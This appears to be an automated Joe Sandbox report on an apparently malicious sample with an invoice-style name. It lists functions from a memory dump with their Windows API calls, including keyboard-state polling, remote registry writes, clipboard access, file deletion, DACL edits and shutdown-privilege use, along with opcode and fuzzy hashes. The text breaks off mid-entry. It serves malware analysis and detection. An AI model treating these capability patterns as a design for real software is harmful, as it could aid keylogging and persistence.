                                          • Opcode ID: 1ac841002657d40157d1ab7e6e5330cdbfd4f5b84383663aa5651c0c1f562b99
                                          • Instruction ID: 33b24c538bbf39843169279a0cd309cff576982b3bab1effc70aef06acaf2558
                                          • Opcode Fuzzy Hash: 1ac841002657d40157d1ab7e6e5330cdbfd4f5b84383663aa5651c0c1f562b99
                                          • Instruction Fuzzy Hash: F231C2765002196EDF10DBB4EC58ADE73ECAF09366F1455B6E808F30A0EB30DA89CA54
                                          Function 00E70AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E70BDE
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00E7F910,00000000,?,00000000,?,?), ref: 00E70C4C
                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00E70C94
                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00E70D1D
                                          • RegCloseKey.ADVAPI32(?), ref: 00E7103D
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00E7104A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Close$ConnectCreateRegistryValue
                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                          • API String ID: 536824911-966354055
                                          • Opcode ID: c2ad8626b1a926af0dd2760f230a67afa19fd76b200794a0ee1b154074af6b56
                                          • Instruction ID: 6cbd969e1abae2eb183469b2fc3f48c780f43f2cc00352054ef42f523c5b9e39
                                          • Opcode Fuzzy Hash: c2ad8626b1a926af0dd2760f230a67afa19fd76b200794a0ee1b154074af6b56
                                          • Instruction Fuzzy Hash: 620249756006019FCB14EF24C891A2AB7E5FF89714F05D85DF98AAB362CB70ED41CB91
                                          Function 00E5F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00E5F37E
                                          • _wcscmp.LIBCMT ref: 00E5F393
                                          • _wcscmp.LIBCMT ref: 00E5F3AA
                                            • Part of subcall function 00E545C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E545DC
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00E5F3D9
                                          • FindClose.KERNEL32(00000000), ref: 00E5F3E4
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00E5F400
                                          • _wcscmp.LIBCMT ref: 00E5F427
                                          • _wcscmp.LIBCMT ref: 00E5F43E
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00E5F450
                                          • SetCurrentDirectoryW.KERNEL32(00EAA5A0), ref: 00E5F46E
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E5F478
                                          • FindClose.KERNEL32(00000000), ref: 00E5F485
                                          • FindClose.KERNEL32(00000000), ref: 00E5F497
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                          • String ID: *.*
                                          • API String ID: 1824444939-438819550
                                          • Opcode ID: d0e6418d65d11096b648c2601aa7790d54c7077ca1ced91e2286aa5536790f79
                                          • Instruction ID: ae9500259fa96ba71ee7347435dfa8bc00fa87c15aff107583d7e057587c06a8
                                          • Opcode Fuzzy Hash: d0e6418d65d11096b648c2601aa7790d54c7077ca1ced91e2286aa5536790f79
                                          • Instruction Fuzzy Hash: AC31C2715012196FDF10DB64EC88AEF77AC9F09365F1416B5EC54B30A0DB30DA89CA64
                                          Function 00E481F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E4874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E48766
                                            • Part of subcall function 00E4874A: GetLastError.KERNEL32(?,00E4822A,?,?,?), ref: 00E48770
                                            • Part of subcall function 00E4874A: GetProcessHeap.KERNEL32(00000008,?,?,00E4822A,?,?,?), ref: 00E4877F
                                            • Part of subcall function 00E4874A: HeapAlloc.KERNEL32(00000000,?,00E4822A,?,?,?), ref: 00E48786
                                            • Part of subcall function 00E4874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E4879D
                                            • Part of subcall function 00E487E7: GetProcessHeap.KERNEL32(00000008,00E48240,00000000,00000000,?,00E48240,?), ref: 00E487F3
                                            • Part of subcall function 00E487E7: HeapAlloc.KERNEL32(00000000,?,00E48240,?), ref: 00E487FA
                                            • Part of subcall function 00E487E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E48240,?), ref: 00E4880B
                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E4825B
                                          • _memset.LIBCMT ref: 00E48270
                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E4828F
                                          • GetLengthSid.ADVAPI32(?), ref: 00E482A0
                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00E482DD
                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E482F9
                                          • GetLengthSid.ADVAPI32(?), ref: 00E48316
                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E48325
                                          • HeapAlloc.KERNEL32(00000000), ref: 00E4832C
                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E4834D
                                          • CopySid.ADVAPI32(00000000), ref: 00E48354
                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E48385
                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E483AB
                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E483BF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                          • String ID:
                                          • API String ID: 3996160137-0
                                          • Opcode ID: 8b67b5b259a5c20deae35a7c48ad1a60a6c9fb1244de851132298594022b28f1
                                          • Instruction ID: 9f7a1d2b49ad062a4bf5bafd2a6b01299e83cf18a48ac5a6dbde303982bd8b93
                                          • Opcode Fuzzy Hash: 8b67b5b259a5c20deae35a7c48ad1a60a6c9fb1244de851132298594022b28f1
                                          • Instruction Fuzzy Hash: 62613771900209EFDF10DFA5EE84AEEBBB9FF04704F149169E815B7291DB319A45CB60
                                          Function 00E06843 Relevance: 20.9, Strings: 16, Instructions: 883COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa$PJ$UCP)$UTF)$UTF16)
                                          • API String ID: 0-1331342731
                                          • Opcode ID: 032dfbc88fb354a893d4e223ce064570b288105a712aec9b9ca021711d3ca32e
                                          • Instruction ID: 67380a6c59c81eb1ef8ca265ec46c2af0db5fd325db4819da9ff76d152a396cd
                                          • Opcode Fuzzy Hash: 032dfbc88fb354a893d4e223ce064570b288105a712aec9b9ca021711d3ca32e
                                          • Instruction Fuzzy Hash: D5725E71E002199BDF24DF59D8807EEB7F5EF88314F1491AAE949BB290DB709D81CB90
                                          Function 00E70665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E710A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E70038,?,?), ref: 00E710BC
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E70737
                                            • Part of subcall function 00DF9997: __itow.LIBCMT ref: 00DF99C2
                                            • Part of subcall function 00DF9997: __swprintf.LIBCMT ref: 00DF9A0C
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00E707D6
                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00E7086E
                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00E70AAD
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00E70ABA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                          • String ID:
                                          • API String ID: 1240663315-0
                                          • Opcode ID: 494778d7136fd66164bbf592380ded19574780d3aec87a6720e93a8d855a7598
                                          • Instruction ID: 5aaa674ba5335c01706f793a81a41e9c0a7d98585c5e649bd471fb0c7fb58f81
                                          • Opcode Fuzzy Hash: 494778d7136fd66164bbf592380ded19574780d3aec87a6720e93a8d855a7598
                                          • Instruction Fuzzy Hash: DEE15B71604200EFCB14DF29C891E6ABBE4EF89714F04D56DF94AEB2A2DA30E945CB51
                                          Function 00E50219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 00E50241
                                          • GetAsyncKeyState.USER32(000000A0), ref: 00E502C2
                                          • GetKeyState.USER32(000000A0), ref: 00E502DD
                                          • GetAsyncKeyState.USER32(000000A1), ref: 00E502F7
                                          • GetKeyState.USER32(000000A1), ref: 00E5030C
                                          • GetAsyncKeyState.USER32(00000011), ref: 00E50324
                                          • GetKeyState.USER32(00000011), ref: 00E50336
                                          • GetAsyncKeyState.USER32(00000012), ref: 00E5034E
                                          • GetKeyState.USER32(00000012), ref: 00E50360
                                          • GetAsyncKeyState.USER32(0000005B), ref: 00E50378
                                          • GetKeyState.USER32(0000005B), ref: 00E5038A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: State$Async$Keyboard
                                          • String ID:
                                          • API String ID: 541375521-0
                                          • Opcode ID: f9343f05de9e998dfcd8dc493cd56d2cd03d549741de222f61be916277587558
                                          • Instruction ID: 5e4ff99402c6147c6e1898267106da008fa2c09915e53356f540e4369f4ee1b5
                                          • Opcode Fuzzy Hash: f9343f05de9e998dfcd8dc493cd56d2cd03d549741de222f61be916277587558
                                          • Instruction Fuzzy Hash: 424186245047CA6FFF319A64C8083B5BFA06F1234AF48589DEDC6661D3EB945DCC87A2
                                          Function 00E64458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                          • String ID:
                                          • API String ID: 1737998785-0
                                          • Opcode ID: 364f5095de0d7bfcf6906875e73bf6ee0757976f247d048a25e5c1fc722f920d
                                          • Instruction ID: be606fec9dbf4d63029fc9a152124eac879c47d14957b224afee551189d4fa8b
                                          • Opcode Fuzzy Hash: 364f5095de0d7bfcf6906875e73bf6ee0757976f247d048a25e5c1fc722f920d
                                          • Instruction Fuzzy Hash: F821A1752402119FDB11EF61EC19B6AB7A8EF04754F10802AF90AFB2B1DB74AC40CB95
                                          Function 00E53A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DF48A1,?,?,00DF37C0,?), ref: 00DF48CE
                                            • Part of subcall function 00E54CD3: GetFileAttributesW.KERNEL32(?,00E53947), ref: 00E54CD4
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00E53ADF
                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00E53B87
                                          • MoveFileW.KERNEL32(?,?), ref: 00E53B9A
                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00E53BB7
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E53BD9
                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00E53BF5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                          • String ID: \*.*
                                          • API String ID: 4002782344-1173974218
                                          • Opcode ID: edef731ec6fbbb73f54fa750f8ee9743ed10249f9ac14be1b335dd5eb01e6a8e
                                          • Instruction ID: 1caca28529a009a7f6bf0276761bb3372e3cc2377bd3200c78943b1fe229dcfe
                                          • Opcode Fuzzy Hash: edef731ec6fbbb73f54fa750f8ee9743ed10249f9ac14be1b335dd5eb01e6a8e
                                          • Instruction Fuzzy Hash: FA517E3180514DAACF05EBA0DD929FDB7B8AF14345F2495A9E90677092EF206F0DCB70
                                          Function 00E04140 Relevance: 13.4, APIs: 1, Strings: 6, Instructions: 1132COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ERCP$Oa$VUUU$VUUU$VUUU$VUUU
                                          • API String ID: 0-3486589167
                                          • Opcode ID: b4e2e310576217790bf3f2180cd63db7ab36b44782f8e8d33954cc97de5ea77c
                                          • Instruction ID: 45bde345ee627a55521ee97c43df9d9886623e0737f33aa851807d92ecfad0e6
                                          • Opcode Fuzzy Hash: b4e2e310576217790bf3f2180cd63db7ab36b44782f8e8d33954cc97de5ea77c
                                          • Instruction Fuzzy Hash: DFA26DF0A0421ACBDF24CF58CA947ADB7B1BB54318F14A1AAE955B72C0E7709EC5CB50
                                          Function 00E5F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DF7F41: _memmove.LIBCMT ref: 00DF7F82
                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00E5F6AB
                                          • Sleep.KERNEL32(0000000A), ref: 00E5F6DB
                                          • _wcscmp.LIBCMT ref: 00E5F6EF
                                          • _wcscmp.LIBCMT ref: 00E5F70A
                                          • FindNextFileW.KERNEL32(?,?), ref: 00E5F7A8
                                          • FindClose.KERNEL32(00000000), ref: 00E5F7BE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                          • String ID: *.*
                                          • API String ID: 713712311-438819550
                                          • Opcode ID: a26572c14fb4533facbac7d3f6dcea1ef39646653f90bdbe8e54a9b5323c3a12
                                          • Instruction ID: 8f9ea6afc946194ef5f18f2a318550bf79a1c3217e5a4177b4d5bd90faa2819e
                                          • Opcode Fuzzy Hash: a26572c14fb4533facbac7d3f6dcea1ef39646653f90bdbe8e54a9b5323c3a12
                                          • Instruction Fuzzy Hash: E841817191020A9FCF11DF64CC45AEEBBB4FF09315F144966E919B71A1EB309E88CBA0
                                          Function 00E058C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: cb03b15d63dc4800ba36dd12009e51f0759a470ddf1e47ceae7f45f72aac694c
                                          • Instruction ID: b5ad230d70bedebb54e29cbd3cfc506135dffc78cf91ec74ec96528fa53bbd58
                                          • Opcode Fuzzy Hash: cb03b15d63dc4800ba36dd12009e51f0759a470ddf1e47ceae7f45f72aac694c
                                          • Instruction Fuzzy Hash: E212A871A00609DFDF04DFA5E981AEEB7F5FF48300F109269E506B7291EB35A991CB60
                                          Function 00E05680 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 516COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E10FF6: std::exception::exception.LIBCMT ref: 00E1102C
                                            • Part of subcall function 00E10FF6: __CxxThrowException@8.LIBCMT ref: 00E11041
                                          • _memmove.LIBCMT ref: 00E4062F
                                          • _memmove.LIBCMT ref: 00E40744
                                          • _memmove.LIBCMT ref: 00E407EB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                          • String ID: yZ
                                          • API String ID: 1300846289-3798167742
                                          • Opcode ID: 4e825081b9b6f03d23f3402207437505278b798f051749b3e7f4afffee08602a
                                          • Instruction ID: 70fd9d3cf86f7e3b7adf2ecdd8e146287f316eb9dd907969ffa39d17a22c3fde
                                          • Opcode Fuzzy Hash: 4e825081b9b6f03d23f3402207437505278b798f051749b3e7f4afffee08602a
                                          • Instruction Fuzzy Hash: 9D02A271E00209DFCF04DF64E9816AE7BF5EF48300F159069E906EB295EB31D995CBA1
                                          Function 00E5545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E48CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E48D0D
                                            • Part of subcall function 00E48CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E48D3A
                                            • Part of subcall function 00E48CC3: GetLastError.KERNEL32 ref: 00E48D47
                                          • ExitWindowsEx.USER32(?,00000000), ref: 00E5549B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                          • String ID: $@$SeShutdownPrivilege
                                          • API String ID: 2234035333-194228
                                          • Opcode ID: 5cfbb55507412a52b2ecb79c58382dbd94834ee1896cd79c10aae0a8ea2e7094
                                          • Instruction ID: cfabcd086dd154bc06e6adb3f7a8fb8a14a452e74c5eb838318ad6cd9f3547e0
                                          • Opcode Fuzzy Hash: 5cfbb55507412a52b2ecb79c58382dbd94834ee1896cd79c10aae0a8ea2e7094
                                          • Instruction Fuzzy Hash: 6B01FC33655B115EE7285678EC6ABBA7298EB05353F242931FD27F60D3DA501C8C8590
                                          Function 00E03190 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: __itow__swprintf
                                          • String ID: Oa
                                          • API String ID: 674341424-3945284152
                                          • Opcode ID: e3fd209ab8bd18b8eb5f69392ce862962ab25884f1ee10a5cdfc020c05f66642
                                          • Instruction ID: 9ab4cfb859c31b7b6c2510f923e174a056aa797abc99187f2fc8c21a5e7e093d
